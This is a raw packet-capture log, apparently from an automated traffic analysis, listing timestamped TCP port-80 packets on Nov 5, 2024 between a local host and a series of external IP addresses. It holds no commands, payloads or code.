                                                                                                              Nov 5, 2024 15:35:32.517275095 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:32.695349932 CET8049764203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:32.695585966 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:32.703387022 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:32.703443050 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:32.703473091 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:32.881875038 CET8049764203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:32.881880999 CET8049764203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:32.881886005 CET8049764203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:32.898757935 CET8049764203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:32.898839951 CET8049764203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:32.899013042 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:34.217979908 CET4976480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:35.235641956 CET4976580192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:35.411715031 CET8049765203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:35.411978960 CET4976580192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:35.417129993 CET4976580192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:35.593621016 CET8049765203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:35.603905916 CET8049765203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:35.604000092 CET8049765203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:35.604252100 CET4976580192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:35.606163979 CET4976580192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:35:35.782166004 CET8049765203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:35:40.726126909 CET4976680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:40.902173042 CET804976668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:40.902396917 CET4976680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:40.910063028 CET4976680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:41.091934919 CET804976668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:41.092016935 CET804976668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:41.092061043 CET804976668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:41.092107058 CET804976668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:41.092140913 CET804976668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:41.092159033 CET4976680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:41.092173100 CET804976668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:41.092493057 CET4976680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:42.419364929 CET4976680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:43.437138081 CET4976780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:43.615015030 CET804976768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:43.615271091 CET4976780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:43.622961998 CET4976780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:43.803977966 CET804976768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:43.804078102 CET804976768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:43.804094076 CET804976768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:43.804109097 CET804976768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:43.804120064 CET804976768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:43.804163933 CET804976768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:43.804362059 CET4976780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:45.137571096 CET4976780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:46.155397892 CET4976880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:46.331444979 CET804976868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:46.331727982 CET4976880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:46.339553118 CET4976880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:46.339608908 CET4976880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:46.516841888 CET804976868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:46.516896963 CET804976868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:46.516930103 CET804976868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:46.535250902 CET804976868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:46.535319090 CET804976868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:46.535367012 CET804976868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:46.535413027 CET804976868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:46.535443068 CET804976868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:46.535478115 CET804976868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:46.535572052 CET4976880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:46.535742998 CET4976880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:47.855606079 CET4976880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:48.873228073 CET4976980192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:49.051536083 CET804976968.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:49.051745892 CET4976980192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:49.057204008 CET4976980192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:49.237687111 CET804976968.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:49.237756968 CET804976968.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:49.237807035 CET804976968.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:49.237852097 CET804976968.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:49.237894058 CET804976968.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:49.237937927 CET804976968.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:49.237979889 CET804976968.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:49.237987041 CET4976980192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:49.238028049 CET804976968.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:49.238030910 CET4976980192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:49.238061905 CET804976968.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:49.238085985 CET4976980192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:49.238255024 CET4976980192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:49.240101099 CET4976980192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:35:49.418620110 CET804976968.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:35:55.161678076 CET4977080192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:35:55.480856895 CET804977045.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:35:55.481074095 CET4977080192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:35:55.488802910 CET4977080192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:35:55.807821989 CET804977045.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:35:55.808893919 CET804977045.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:35:55.808944941 CET804977045.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:35:55.809115887 CET4977080192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:35:56.994261980 CET4977080192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:35:58.011699915 CET4977180192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:35:58.321960926 CET804977145.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:35:58.322154999 CET4977180192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:35:58.329834938 CET4977180192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:35:58.639374018 CET804977145.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:35:58.640630007 CET804977145.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:35:58.640639067 CET804977145.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:35:58.640785933 CET4977180192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:35:59.837373018 CET4977180192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:36:00.854883909 CET4977280192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:36:01.166173935 CET804977245.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:36:01.166424990 CET4977280192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:36:01.174194098 CET4977280192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:36:01.174261093 CET4977280192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:36:01.485243082 CET804977245.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:36:01.485723972 CET804977245.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:36:01.486511946 CET804977245.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:36:01.487114906 CET804977245.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:36:01.490061998 CET804977245.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:36:01.490475893 CET4977280192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:36:02.680990934 CET4977280192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:36:03.698380947 CET4977380192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:36:04.016330957 CET804977345.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:36:04.016555071 CET4977380192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:36:04.022237062 CET4977380192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:36:04.339998960 CET804977345.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:36:04.342394114 CET804977345.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:36:04.342444897 CET804977345.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:36:04.342756987 CET4977380192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:36:04.344516993 CET4977380192.168.11.2045.150.55.15
                                                                                                              Nov 5, 2024 15:36:04.662307024 CET804977345.150.55.15192.168.11.20
                                                                                                              Nov 5, 2024 15:36:09.521842003 CET4977480192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:09.630553961 CET804977450.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:09.630723953 CET4977480192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:09.638406992 CET4977480192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:09.746170998 CET804977450.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:09.771873951 CET804977450.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:09.771974087 CET804977450.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:09.771981001 CET804977450.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:09.772154093 CET804977450.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:09.772169113 CET4977480192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:09.772341967 CET4977480192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:11.147459984 CET4977480192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:12.165297031 CET4977580192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:12.273473024 CET804977550.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:12.273674011 CET4977580192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:12.281435966 CET4977580192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:12.389162064 CET804977550.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:12.408978939 CET804977550.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:12.409024000 CET804977550.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:12.409080029 CET804977550.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:12.409085989 CET804977550.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:12.409312010 CET4977580192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:13.787508011 CET4977580192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:14.804955006 CET4977680192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:14.913656950 CET804977650.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:14.913899899 CET4977680192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:14.921763897 CET4977680192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:14.921844006 CET4977680192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:15.029874086 CET804977650.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:15.029898882 CET804977650.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:15.029917002 CET804977650.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:15.030113935 CET804977650.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:15.030133009 CET804977650.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:15.030144930 CET804977650.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:15.030160904 CET804977650.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:15.055460930 CET804977650.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:15.055473089 CET804977650.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:15.055484056 CET804977650.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:15.055490971 CET804977650.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:17.446938992 CET4977780192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:17.555171013 CET804977750.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:17.555399895 CET4977780192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:17.560540915 CET4977780192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:17.668180943 CET804977750.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:17.668472052 CET804977750.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:17.668488026 CET804977750.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:17.668581009 CET804977750.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:17.668593884 CET804977750.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:17.668952942 CET4977780192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:17.671972036 CET4977780192.168.11.2050.19.214.227
                                                                                                              Nov 5, 2024 15:36:17.779684067 CET804977750.19.214.227192.168.11.20
                                                                                                              Nov 5, 2024 15:36:22.790349007 CET4977880192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:22.900994062 CET804977813.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:22.901177883 CET4977880192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:22.908857107 CET4977880192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:23.035676956 CET804977813.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:23.036252022 CET804977813.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:23.036417007 CET4977880192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:24.410181046 CET4977880192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:24.518920898 CET804977813.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:25.427666903 CET4977980192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:25.537864923 CET804977913.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:25.538047075 CET4977980192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:25.545689106 CET4977980192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:25.654776096 CET804977913.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:25.654877901 CET804977913.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:25.655112028 CET4977980192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:27.050292015 CET4977980192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:27.159535885 CET804977913.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:28.067715883 CET4978080192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:28.178237915 CET804978013.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:28.178461075 CET4978080192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:28.186302900 CET4978080192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:28.186389923 CET4978080192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:28.295923948 CET804978013.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:28.296005011 CET804978013.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:28.296042919 CET804978013.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:28.296072006 CET804978013.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:28.296531916 CET804978013.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:30.707797050 CET4978180192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:30.819636106 CET804978113.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:30.819884062 CET4978180192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:30.833393097 CET4978180192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:30.943423033 CET804978113.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:30.944552898 CET804978113.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:30.944608927 CET804978113.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:30.944869995 CET4978180192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:30.948765993 CET4978180192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:31.058932066 CET804978113.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:44.248358011 CET4978280192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:44.360007048 CET804978213.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:44.360192060 CET4978280192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:44.367878914 CET4978280192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:44.482261896 CET804978213.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:44.482306957 CET804978213.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:44.482485056 CET4978280192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:45.874186039 CET4978280192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:45.984240055 CET804978213.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:46.891695976 CET4978380192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:47.001668930 CET804978313.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:47.001856089 CET4978380192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:47.011559963 CET4978380192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:47.121239901 CET804978313.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:47.121478081 CET804978313.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:47.121639013 CET4978380192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:48.514239073 CET4978380192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:48.623239040 CET804978313.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.531749964 CET4978480192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:49.641918898 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.642262936 CET4978480192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:49.650089025 CET4978480192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:49.650146961 CET4978480192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:49.758795023 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.759351969 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.759386063 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.759408951 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.759430885 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.759455919 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:49.759479046 CET804978413.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:52.171834946 CET4978580192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:52.283277988 CET804978513.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:52.283478975 CET4978580192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:52.288631916 CET4978580192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:52.398204088 CET804978513.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:52.399775028 CET804978513.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:52.399818897 CET804978513.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:36:52.400037050 CET4978580192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:52.401878119 CET4978580192.168.11.2013.248.169.48
                                                                                                              Nov 5, 2024 15:36:52.511255026 CET804978513.248.169.48192.168.11.20
                                                                                                              Nov 5, 2024 15:37:06.704945087 CET4978680192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:06.813395977 CET804978615.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:06.813647985 CET4978680192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:06.821808100 CET4978680192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:06.930212975 CET804978615.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:08.338104963 CET4978680192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:08.487034082 CET804978615.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:09.355752945 CET4978780192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:09.463982105 CET804978715.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:09.464241028 CET4978780192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:09.471915960 CET4978780192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:09.580096006 CET804978715.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:09.581113100 CET804978715.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:09.581393003 CET4978780192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:10.978121042 CET4978780192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:11.085989952 CET804978715.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:11.995568037 CET4978880192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:12.104183912 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.104348898 CET4978880192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:12.112953901 CET4978880192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:12.113018990 CET4978880192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:12.221524000 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.221599102 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.221628904 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.221654892 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.221700907 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.221728086 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.221966982 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.222765923 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:12.223040104 CET4978880192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:13.618174076 CET4978880192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:13.726573944 CET804978815.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.029328108 CET804978615.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.029486895 CET4978680192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.635885000 CET4978980192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.743885994 CET804978915.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.744147062 CET4978980192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.749298096 CET4978980192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.857198954 CET804978915.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.859739065 CET804978915.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.859783888 CET804978915.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.860120058 CET4978980192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.861934900 CET4978980192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.864253998 CET804978915.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:14.864461899 CET4978980192.168.11.2015.197.148.33
                                                                                                              Nov 5, 2024 15:37:14.969794035 CET804978915.197.148.33192.168.11.20
                                                                                                              Nov 5, 2024 15:37:22.946366072 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.048924923 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.049195051 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.054768085 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.157346964 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.683861017 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.683919907 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.683989048 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684032917 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684075117 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684114933 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684155941 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684184074 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684211969 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.684226990 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.684398890 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.684573889 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.685767889 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:23.686008930 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.687426090 CET4979080192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:37:23.789812088 CET8049790104.21.94.87192.168.11.20
                                                                                                              Nov 5, 2024 15:37:28.695166111 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:28.813013077 CET804979166.198.240.15192.168.11.20
